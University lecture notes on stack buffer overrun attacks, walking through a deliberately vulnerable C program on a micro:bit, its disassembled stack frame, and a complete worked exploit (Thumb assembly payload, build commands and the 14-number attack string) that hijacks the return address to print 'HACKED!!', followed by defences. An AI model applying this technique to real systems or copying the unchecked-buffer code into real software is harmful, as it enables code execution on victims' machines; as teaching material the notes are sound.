Lecture 7 – Buffer overrun attacks (Digital Systems)

The victim

One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:

/* getnum -- read a line of input and convert to a number */
int getnum(void)
{
    char buf[64];
    getline(buf);
    return atoi(buf);
}

void init(void)
{
    int n = 0, total;
    int data[10];

    serial_init();

    printf("Enter numbers, 0 to finish\n");
    while (1) {
        int x = getnum();
        if (x == 0) break;
        data[n++] = x;
    }

    total = 0;
    for (int i = 0; i < n; i++)
        total += data[i];
    
    printf("Total = %d\n", total);    
}

That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read a sequence of numbers and store them in an array. Finally, the program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string HACKED!! over and over.

The flaw in the program is that it doesn't check that the input contains at most 10 numbers, and continues to accept and store numbers even when the array is full. It is this weakness we shall exploit.

Context

This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems. There is actually another, more insidious, problem in the program, and that is the interface of the routine getline, which takes as a parameter the address of a character array to store the line, but has no way of knowing how big that array is, and so cannot guard against overflowing it. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.
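Both repairs can be sketched in a few lines of C. This is only an illustration, assuming a hosted C library with fgets and a FILE stream, which the micro:bit program itself does not have. The names getnum_checked, read_numbers and MAXNUMS are made up for the sketch and are not part of the original program.

```c
#include <stdio.h>
#include <stdlib.h>

#define MAXNUMS 10   /* hypothetical name for the capacity of data[] */

/* getnum_checked -- read one line from fp and convert it to a number.
   fgets stores at most sizeof(buf)-1 characters plus a terminating zero,
   so buf cannot overflow. End of input is treated like a terminating 0. */
int getnum_checked(FILE *fp)
{
    char buf[64];
    if (fgets(buf, sizeof(buf), fp) == NULL)
        return 0;
    return atoi(buf);
}

/* read_numbers -- store numbers in data[0..cap) until a 0 is read
   or the array is full; returns the count of numbers stored */
int read_numbers(FILE *fp, int data[], int cap)
{
    int n = 0;
    while (n < cap) {
        int x = getnum_checked(fp);
        if (x == 0) break;
        data[n++] = x;
    }
    return n;
}
```

One remaining wrinkle: a line longer than 63 characters is split across successive fgets calls, so its tail would be parsed as a further number. That is a nuisance rather than a memory-safety problem.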

Mounting the attack

Used ordinarily, the program fulfils its purpose.

Enter numbers, 0 to finish
> 123
> 456
> 7
> 0
Total = 586

After printing the total, the program ends, and we must press reset to use it again. But now let's try another sequence of 14 numbers.

Enter numbers, 0 to finish
> -1610370930
> 1200113921
> 59387
> 1217
> 1262698824
> 555828293
> 32
> 1
> 1
> 1
> 1
> 1
> 1
> 536887217
> 0

As you will see, the program runs haywire, printing the same message over and over again. (In the lecture, I used a helper program squirt running on the host computer to automate typing in the numbers – but given enough patience it can be done by hand.)

Analysing the attack

So what are those 14 magic numbers, and how were they determined?

First, we notice that there are 14 numbers, and the buffer declared locally in init has space for only 10 numbers. The first 10 numbers that are input fill up the data array, and the remaining four are written by the program into the space beyond the array, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of init's stack frame.

    +--------------------------------+
    | Return address                 |
    +--------------------------------+
    | Saved R5 value                 |
    +--------------------------------+
    | Saved R4 value                 |
    +--------------------------------+
    | One word of padding            |
    +--------------------------------+
    |                                |
    | 10 words for data array        |
sp: |                                |
    +--------------------------------+

We can deduce the layout of init's frame by looking at its code, obtained by disassembling the program. The code begins like this:

00000224 <init>:
 224:   b530            push    {r4, r5, lr}
 226:   b08b            sub     sp, #44 ; 0x2c
 228:   f7ff ff4a       bl      c0 <serial_init>
 22c:   480d            ldr     r0, [pc, #52]   ; (264 <init+0x40>)
 22e:   f000 f947       bl      4c0 <printf>
 232:   2400            movs    r4, #0
 234:   f7ff ffec       bl      210 <getnum>
 238:   2800            cmp     r0, #0
 23a:   d004            beq.n   246 <init+0x22>
 23c:   00a3            lsls    r3, r4, #2
 23e:   466a            mov     r2, sp
 240:   5098            str     r0, [r3, r2]
 242:   3401            adds    r4, #1
 244:   e7f6            b.n     234 <init+0x10>

The function begins by saving three registers, then subtracting 44 from the stack pointer, enough space for the 40-byte data array, plus four bytes of padding that are included so as to keep the stack pointer a multiple of eight in obedience to the ARM calling convention.

The local variable n lives in register r4, and later in the function, the statement data[n++] = x is translated into the four instructions starting with lsls at address 0x23c: first r3 is set to 4*n, then r2 is set to the value of sp, and x, currently resident in r0, is stored at the address formed by adding r2 and r3, just as we would expect if the array begins at the stack pointer as the picture shows.
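The same arithmetic can be written out in C to see where each stored number lands. This is a sketch based only on the prologue and the frame picture above; the names store_offset and slot_name and the enum constants are invented for the illustration.

```c
#include <stddef.h>

enum {
    DATA_WORDS  = 10,                          /* int data[10] */
    LOCAL_BYTES = 44,                          /* sub sp, #44 */
    SAVED_REGS  = 3,                           /* push {r4, r5, lr} */
    FRAME_BYTES = LOCAL_BYTES + 4 * SAVED_REGS /* whole frame of init */
};

/* Byte offset from sp of the word written by data[n] = x,
   as computed by lsls r3, r4, #2 */
size_t store_offset(size_t n)
{
    return 4 * n;
}

/* Name the slot of init's frame that the n-th stored number lands in */
const char *slot_name(size_t n)
{
    size_t off = store_offset(n);
    if (off < 4 * DATA_WORDS)   return "data array";
    if (off < LOCAL_BYTES)      return "padding";
    if (off == LOCAL_BYTES)     return "saved r4";
    if (off == LOCAL_BYTES + 4) return "saved r5";
    if (off == LOCAL_BYTES + 8) return "return address";
    return "beyond the frame";
}
```

Numbers with index 0 to 9 stay inside the array, index 10 hits the padding word, 11 and 12 hit the saved registers, and index 13 (the fourteenth number) lands on the return address.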

Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.

Ok, we will make our attack string contain 10 integers to fill up the buffer, another three integers to overwrite the next three words of the stack, and then one more integer that will overwrite the return address of init with a value of our choosing. By doing this, we can arrange that when init returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in init, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the data array by the victim. In a more complicated program, different calls to init might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.

The layout we plan for the attack string is like this:

40 bytes of code
Another 12 bytes of padding
Address of the code
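Seen from the attacker's side, the plan amounts to a 56-byte record. The struct below is only a way of checking the sizes and offsets on paper; the type name attack_string and its field names are hypothetical, and the real attack string is produced by the assembler rather than by C code.

```c
#include <stddef.h>
#include <stdint.h>

/* Planned layout of the attack string, as it will sit in init's frame */
struct attack_string {
    uint8_t  code[40];    /* fills data[0..9]: code, message and filler */
    uint32_t filler[3];   /* overwrites padding, saved r4, saved r5 */
    uint32_t ret;         /* overwrites init's return address */
};

/* Number of 32-bit integers that must be typed in */
enum { ATTACK_WORDS = sizeof(struct attack_string) / sizeof(uint32_t) };
```

The return address field sits at byte offset 52, and the whole record is 14 words long, which is why the attack needs exactly 14 numbers.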

There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.

After the stack frame of init has been overwritten by the input loop, the rest of init runs as usual: the total of the 14 numbers we have input is computed and printed. Then init returns to our chosen return address, and the code we placed in the buffer starts to run.

Context

The layout of the stack frame for init is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.

Building a binary

We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:

    .equ printf, 0x4c0      @ Address of printf
    .equ frame, 0x20003fb0  @ Captured stack pointer value in init

    .text
attack:
    sub sp, #56             @  0: Reserve stack space again
again:
    adr r0, message         @  2: Address of our message
    ldr r1, =printf+1       @  4: Absolute address for call
    blx r1                  @  6: Call printf
    b again                 @  8: Spin forever
    .pool                   @ 12: constant pool
message:
    .asciz "HACKED!! "      @ 16: string -- 10 bytes
    .balign 4, 0            @ pad to 28 bytes
    .word 1, 1, 1, 1        @ 28: fill up to 44 bytes
    .word 1, 1              @ 44: Saved r4, r5
    .word frame+1           @ 52: Faked return address
                            @ Total size 56

By the time this code is reached, init will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call printf, its stack frame will not overwrite our code. Then there is a call that passes the message to printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.^[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.

Some details to dispel any mystery:

The adr instruction assembles into an instruction add r0, pc, #n that sets r0 to the address of the message: the assembler determines the value of n.
The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
The directive .balign 4, 0 pads the program with zero bytes (0) until its size is a multiple of 4, so that the .word directives that follow are word-aligned.
Each .word directive contributes a four-byte word to the output of the assembler.
The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.
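The address arithmetic behind these details can be checked with a few small C functions. This is a sketch using the two addresses from the .equ directives; the function names are invented here, and pc_relative follows the usual Thumb rule that pc reads as the instruction's address plus 4, rounded down to a multiple of 4.

```c
#include <stdint.h>

#define PRINTF_ADDR 0x000004c0u   /* .equ printf */
#define FRAME_ADDR  0x20003fb0u   /* .equ frame: sp inside init */
#define FRAME_BYTES 56u           /* 44 bytes of locals + 3 saved registers */

/* Mark an address as Thumb code by setting its least significant bit */
uint32_t thumb_target(uint32_t addr)
{
    return addr | 1u;
}

/* Stack pointer just after init has returned: the whole frame is popped */
uint32_t sp_on_return(uint32_t frame)
{
    return frame + FRAME_BYTES;
}

/* Stack pointer after the attack code's own sub sp, #56 */
uint32_t sp_after_reserve(uint32_t frame)
{
    return sp_on_return(frame) - 56u;
}

/* Address referred to by a pc-relative Thumb instruction (adr, ldr =)
   located at instr_addr with immediate offset imm */
uint32_t pc_relative(uint32_t instr_addr, uint32_t imm)
{
    return ((instr_addr + 4u) & ~3u) + imm;
}
```

With these definitions, thumb_target(PRINTF_ADDR) is 0x4c1 and thumb_target(FRAME_ADDR) is 0x20003fb1, the two constants that end up in the attack string. After the sub instruction the stack pointer is back at the start of the buffer, so printf's frame is allocated below our code instead of on top of it.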

There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.

arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o

Next, we use objcopy to turn the .o file into a binary image.

arm-none-eabi-objcopy -O binary attack.o attack.bin

Then we can use the (slightly misnamed) hexdump utility to format the binary data as a sequence of decimal integers.

hexdump -v -e '/4 "%d\n"' attack.bin >attack

The file attack then contains the 14 lines shown earlier as input to the victim program. There's a little program squirt that runs on the host and outputs the text like keystrokes to the serial interface of the micro:bit.

Disassembling the file attack.o shows the correspondence between the input to the assembler and the 14 integers that make up the attack string.

00000000 <attack>:
   0:   b08e            sub     sp, #56 ; 0x38
   2:   a003            add     r0, pc, #12     ; (adr r0, 10 <message>)
   4:   4901            ldr     r1, [pc, #4]    ; (c <attack+0xc>)
   6:   4788            blx     r1
   8:   e7fb            b.n     2 <attack+0x2>
   a:   0000            .short  0x0000
   c:   000004c1        .word   0x000004c1

00000010 <message>:
  10:   4b434148        .word   0x4b434148
  14:   21214445        .word   0x21214445
  18:   00000020        .word   0x00000020
  1c:   00000001        .word   0x00000001
  20:   00000001        .word   0x00000001
  24:   00000001        .word   0x00000001
  28:   00000001        .word   0x00000001
  2c:   00000001        .word   0x00000001
  30:   00000001        .word   0x00000001
  34:   20003fb1        .word   0x20003fb1

For example, the first integer is -1610370930, and that is the (signed) value of the bitstring 0xa003b08e.
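The conversion is easy to reproduce in C. The sketch below assembles four bytes, least significant first, into a signed 32-bit value and prints each word as a decimal line, which is roughly what the hexdump format string does on a little-endian host. The names le_word and print_words are made up for the illustration.

```c
#include <stdint.h>
#include <stdio.h>

/* le_word -- assemble four bytes, least significant first,
   into a signed 32-bit value */
int32_t le_word(const unsigned char p[4])
{
    uint32_t u = (uint32_t)p[0] | (uint32_t)p[1] << 8
               | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    if (u & 0x80000000u)                    /* negative in two's complement */
        return -(int32_t)(uint32_t)~u - 1;
    return (int32_t)u;
}

/* print_words -- print each complete 4-byte word of image as a decimal line */
void print_words(const unsigned char *image, size_t len, FILE *out)
{
    for (size_t i = 0; i + 4 <= len; i += 4)
        fprintf(out, "%ld\n", (long)le_word(image + i));
}
```

The first two instructions, b08e and a003, are stored as the bytes 8e b0 03 a0, and le_word turns those into -1610370930. In the same way the final bytes b1 3f 00 20 become 536887217, the planted return address.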

It's possible to use the debugger to capture the precise moment when the pc jumps to an unexpected value. Another page has a (manual) script to follow.

Defence against the dark arts

This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.

We could use a programming language that supports checking of array bounds, and makes it difficult to pass around the addresses of buffers without also passing and checking their size.
This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
The attack depended on knowing a couple of addresses – the address of the init stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.
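Even in C, the first of these defences can be imitated by convention: keep a buffer's address and its size together, and make every store go through a routine that checks the bound. This is a minimal sketch of the idea, not a library API; the type intbuf and the function intbuf_push are hypothetical names.

```c
#include <stdbool.h>
#include <stddef.h>

/* A buffer that carries its capacity and current length with it */
struct intbuf {
    int   *data;   /* storage supplied by the caller */
    size_t cap;    /* number of ints that fit in data */
    size_t len;    /* number of ints stored so far */
};

/* intbuf_push -- append x if there is room; returns false when full */
bool intbuf_push(struct intbuf *b, int x)
{
    if (b->len >= b->cap)
        return false;
    b->data[b->len++] = x;
    return true;
}
```

Had init stored its numbers through such a routine, with cap set to 10, the eleventh and later numbers would have been refused and the saved registers and return address left untouched.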

Linux has at least some of these defences enabled by default, and repeating the attack there is rather more difficult.

[1] That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of init's original return address also has a +1.
